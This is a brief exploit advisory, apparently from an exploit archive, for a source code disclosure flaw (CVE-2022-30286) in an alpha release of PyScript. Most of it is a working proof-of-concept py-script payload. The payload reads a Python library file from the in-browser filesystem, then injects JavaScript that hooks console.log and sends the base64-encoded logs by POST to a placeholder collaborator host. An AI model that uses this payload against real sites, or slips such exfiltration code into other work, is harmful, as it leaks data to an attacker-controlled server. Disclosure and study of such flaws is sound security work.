PyScript 2022-05-04-Alpha Source Code Disclosure

PyScript version 2022-05-04-Alpha suffers from a source code disclosure vulnerability.


SHA-256 | c8d80b5a4fbd624628b801faef45e95b5bdb7e61ed7e6956328402fa7a989edb

# Exploit Title: PyScript Remote Emscripten VMemory Python libraries
Source Codes Read
# Date: 5-9-2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://pyscript.net/
# Software Link: https://github.com/pyscript/pyscript
# Version: 2022-05-04-Alpha
# Tested on: Ubuntu Apache Server
# CVE : CVE-2022-30286

<py-script>
x = "CyberGuy"
if x == "CyberGuy":
with open('/lib/python3.10/asyncio/tasks.py') as output:
contents = output.read()
print(contents)
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
</py-script>


Related Posts